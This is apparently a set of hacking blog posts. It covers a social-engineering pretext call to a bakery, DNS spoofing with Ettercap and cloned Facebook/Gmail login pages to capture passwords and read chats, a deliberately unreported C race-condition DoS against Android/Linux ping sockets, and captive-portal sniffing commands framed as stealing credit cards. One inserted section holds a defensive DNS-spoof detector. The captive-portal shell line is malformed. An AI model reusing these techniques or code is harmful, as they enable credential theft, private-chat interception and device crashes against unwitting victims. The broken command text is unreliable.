The bread attack

One of the most valuable skills in the hacking world is social engineering… in simple words, it is the ability to deceive people, or as I say, “chamaquear”. Well, here is the story.

(The dialogues were in Spanish; translating them to English is complex.)

I have a friend who loves the bread of the dead, this is a bread of the dead:

This bread is baked in October and November for the Day of the Dead, one of the most important dates in Mexico. But some places start to sell the bread in September.

We live in Mexicali, but I’m from Mexico City, and in my city the bakeries are more traditional, and there are bakeries which make the best breads of the dead. But, because these breads are so special, the bakeries only sell them from October 29th to November 3rd… so, in September, how can I get some breads?… hum..

Well.. here is the story:

- Hello
- Yes, Rosetta, good afternoon
- Hi, I'm calling to ask whether you already have bread of the dead. I've heard yours is very good because it's made with rosemary
- Yes, our kitchen has been ranked among the 15 best in the world; however, I'm sorry to tell you that we only sell bread of the dead from October 29 until stock runs out
- Hum.. I understand... is there any way you could make a special order for me?
- I don't really think so, unless it were a very large volume
- Hum.. I understand.. look, let me introduce myself, my name is Judas Gerardo, and basically I'm visiting the city because I have a restaurant in Mexicali, and well, we don't have very traditional food there, so my focus is on bringing the most traditional food of the country to the north so that it becomes known. And for the Day of the Dead I plan to bring bread of the dead from the most traditional bakeries, because it is so badly needed there that people even dare to eat supermarket bread
- Oh God
- Exactly, so I'm starting this new project, and well, I found that Rosetta sells the bread of the dead rated in 2016, and I would like to take some samples to my partners in Mexicali so they can try it and, if they like it, place a much larger order.
- Have you looked at other options?
- I have to be honest, yes; I'm evaluating several bakeries among the 10 best rated, so far I have two, Sucreicacoa and la Pilarika; choosing the one we like most doesn't depend only on me, but well, in the end my intention is to bring the best flavors of the country to the north.
- It's a very ambitious project, and tell me, how many samples do you need?
- I think about 10. Obviously I would pay for them, and if you ask me to, I can pay a higher price. Obviously I anticipate that if you were the ones chosen, we would place an order of at least some 10,000 units.
- Excellent, look, I like your idea, let me put you through to the finance department so we can reach an agreement

Well, this is the first part… I agreed with the bakery on 10 special breads for $4,000 MX (around $200 dlls), which is so expensive, but the person told me that the high price was because… actually I don’t know, but.. hum.. well… see the next part.

- Hello, I'm here to pick up an order of 10 breads that I placed
- Good morning Judas, I'm Elena, the chef and owner of the restaurant; I was told about your project to take our bread to Mexicali
- Yes
- You have a slight, very sing-song accent, but underneath you sound normal
- Yes, I'm a chilango; but well, I partnered with some friends in this crazy venture and well... the truth is that I can't go beyond making scrambled eggs, but I take care of the business relationships
- Come, Judas, sit with me; we have the breads, but I want you to try one fresh out of the oven so you can see its flavor and texture; and I'll treat you to a delicious coffee that they bring us from Chiapas
- Ouuu... hum.. ok

Well, I spent 3 hours talking about Mexicali, about food, about hacking (yeap.. I told her I’m a security guy).. and after that I got my 10 breads for free… so, my friend will taste the best breads from Mexico City, prepared specially for her by one of the most recognized chefs in the world. I hope she really likes the breads because it was so complicated to get them.. but well, I’m an expert social engineer 😉

Ouuu.. well, of the 10 breads, just 2 survived... for her; coff.. coff..

Yes, I know.. this is not a technical post, but good social engineering skills are sometimes more important than technical skills.

Chan, chan, charraaaa…

The magic of the DNS spoofing

After reading the post about intercepting Facebook chats, I talked with a friend about other more “interesting” things that you can do with this simple attack.

Some months ago in Mexico, attacks on the press, supposedly by the government, were revealed, using SMS to infect cellphones.. well, I think an SMS is not necessary, just perform a DNS attack on a captive portal in a Starbucks, a hotel, a company.. and redirect the user to the malware with a simple button…

Doubts?… 🙂

Well… you can also apply a DNS spoofing to *.videosXXXparahackearte.com just to create karma 😛

Reading chats

Well.. sometimes.. you need to know what others are writing about you. Why?.. hum.. well, it’s a good question, and I have a great answer.. ok, no.. but yesterday I needed to… so….

The easiest way is performing DNS poisoning using Ettercap. Open the ettercap.dns, and modify the different domains you want to catch using the attack, for example.. facebook.com, *.facebook.com, *.gmail.com, gmail.com, web.whatsapp.com, etc…

So, after that you have two options: sniff the traffic using Wireshark.. but you need to know that you will need to attack the SSL certificates in order to read the chats, or… open SET, select the web vectors, clone the targets and point them to your computer, for example, clone https://www.facebook.com.

Now, using Ettercap select the targets you want to attack, select in the plug-ins “DNS poison”, and start sniffing. When the user requests a website that you included in the .dns file, he/she will be redirected to your computer and pwned!… you can catch the passwords, the chats, the requests, and it will be “transparent” because actually the DNS is answering with your IP to the victim.

Don’t judge me…
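Seen from the defender's side, the redirection described above leaves two traces on the network: a public name resolving to a LAN address, and two different responses to the same query. The following detector is an added example, not part of the original post; the record layout, the watch list and every address in the sample are constructed for illustration.

```python
import ipaddress
from collections import defaultdict

# Public names from the post's list; none should ever resolve to a LAN address.
WATCHED = ("facebook.com", "gmail.com", "web.whatsapp.com")

# Constructed sample: one tuple per DNS response seen on the LAN
# (time, client, transaction id, query name, A records in that response).
SAMPLE = [
    (10.001, "192.168.1.23", 0x1A2B, "www.facebook.com", ["192.168.1.66"]),
    (10.019, "192.168.1.23", 0x1A2B, "www.facebook.com", ["157.240.0.35"]),
    (11.400, "192.168.1.23", 0x3C4D, "example.org", ["93.184.216.34"]),
    (12.250, "192.168.1.40", 0x5E6F, "web.whatsapp.com", ["10.0.0.5"]),
    (13.000, "192.168.1.40", 0x7A7B, "printer.lan", ["192.168.1.9"]),
]

def is_watched(qname):
    """True if qname is a watched domain or one of its subdomains."""
    name = qname.rstrip(".").lower()
    return any(name == d or name.endswith("." + d) for d in WATCHED)

def is_local(ip):
    """True for private, loopback or link-local addresses."""
    addr = ipaddress.ip_address(ip)
    return addr.is_private or addr.is_loopback or addr.is_link_local

def find_spoofing(responses):
    """Return alerts for local answers to watched names and for conflicting responses."""
    alerts = []
    seen = defaultdict(set)  # (client, txid, qname) -> distinct answer sets
    for ts, client, txid, qname, ips in responses:
        for ip in ips:
            if is_watched(qname) and is_local(ip):
                alerts.append(("local-answer", client, qname, ip))
        seen[(client, txid, qname.lower())].add(frozenset(ips))
    # A forged reply racing the real one shows up as two different
    # responses to the same client, transaction id and name.
    for (client, txid, qname), answer_sets in seen.items():
        if len(answer_sets) > 1:
            merged = sorted(set().union(*answer_sets))
            alerts.append(("conflicting-answers", client, qname, merged))
    return alerts

if __name__ == "__main__":
    for alert in find_spoofing(SAMPLE):
        print(alert)
```

Internal names such as printer.lan are deliberately outside the watch list, so legitimate split-horizon answers do not raise alerts.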

How to lose your Facebook account in some steps

Some months ago I lost my Facebook account, it was hacked by… yep.. by Karen. But how could the incredible, invincible, fabulous vendetta be hacked?…

Well it was easy… actually very easy…

I was happily watching a lot of extreme porn on the Internet when Karen asked me for help, so I connected to a VPN, yeap.. my fault, we were in the same IP range.

She used Ettercap to perform DNS spoofing on www.facebook.com, pointing it to her computer, and on her computer she configured a fake landing page using The Social Engineering Toolkit. I usually need to be connected to different VPNs to work, so it’s normal for me to be disconnected from my accounts. I went to Facebook’s messenger, entered my credentials and… pwned!

u.u

And that’s all… you don’t fall me very well, as we say!

Ping DoS on Linux (Android)

Yep… it sounds weird, maybe it sounds stupid coff.. coff.. and I know, it’s sooooo useless… but… well, the story is this:

On Saturday I went with a friend to hum… well, not to walk, because I live in an extension of hell.. around 40º C, so it is not possible to walk, but to go to some places, and I tried to explain to her the difference between hacking (pentesting, attacks on Facebook, Whatsapp interception, etc) and real hacking (mostly vuln-dev)… she started to laugh when I compared hacking with art… and I told her that yes, sometimes, just as you can start to write, to paint or do whatever you want to do to feel better, you can start to look for bugs… and it’s relaxing and amusing… so I showed her how to find a bug on her phone.. and here is the result.

I’m not very sure if it has been reported to Android or to the Linux kernel project.. but I don’t want to have anything to do with Google or with Linus Torvalds… so I prefer to just publish the bug here.. and on the other hand I’m a bad guy… so I don’t report bugs anymore.

Oh yeap… she was not convinced that hacking is like art and she told me that I’m a geek because I like this kind of strange things D: … I’m not a geek D:

 


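#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <pthread.h>

/* Socket and address are shared by both threads on purpose. */
static int sockfd = 0;
static struct sockaddr_in addr = {0};

/* Second thread: keeps resetting sin_family to 0 and calling connect(). */
void *fuzz(void *param){
    while(1){
        addr.sin_family = 0;
        printf("sin_family1 = %08lx\n", (unsigned long)addr.sin_family);
        connect(sockfd, (struct sockaddr *)&addr, 16);
    }
    return NULL;
}

int main(int argc, char **argv)
{
    /* ICMP datagram ("ping") socket */
    sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
    pthread_t thrd;
    pthread_create(&thrd, NULL, fuzz, NULL);
    /* Main thread: flips sin_family between 0x1a and 0 around connect(),
       racing the other thread on the same socket. */
    while(1){
        addr.sin_family = 0x1a;
        addr.sin_port = 0;
        addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        connect(sockfd, (struct sockaddr *)&addr, 16);
        addr.sin_family = 0;
    }
    return 0;
}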

Attacking captive portals

I live near the USA, where the use of captive portals is so common for everything; basically, if you go to the bathroom you’ll find a captive portal to use the internet while you.. psss… do the thing you do in the bathroom.

The captive portals are amazing places to steal juicy information like credit cards, passwords, credit cards, chats, credit cards, hashes, tokens and.. ah yeah!, credit cards.

Here are my tips:

# airmon-ng start wlan0 [channel]

# tshark -i wlanmon0 -Y 'http.request.method == "GET" || http.request.method == "POST"' | tee -a get3.

(Oh!.. this can also redirect the encrypted traffic)

# grep *.cgi *.pcap | while read line; do NOMBRE=$(echo $line | awk -F "PSM_LAST_NAME"={'print $2'} | cut -d' ' -f1) CUARTO= =$(echo $line | awk -F "ROOM_NO"={'print $2'} | cut -d' ' -f1)

(You can also create a BASH script for the previous line if you’re using a Pineapple).

🙂

Be careful, most captive portals are protected by a SOC or at least an IDS… so… chill out 😉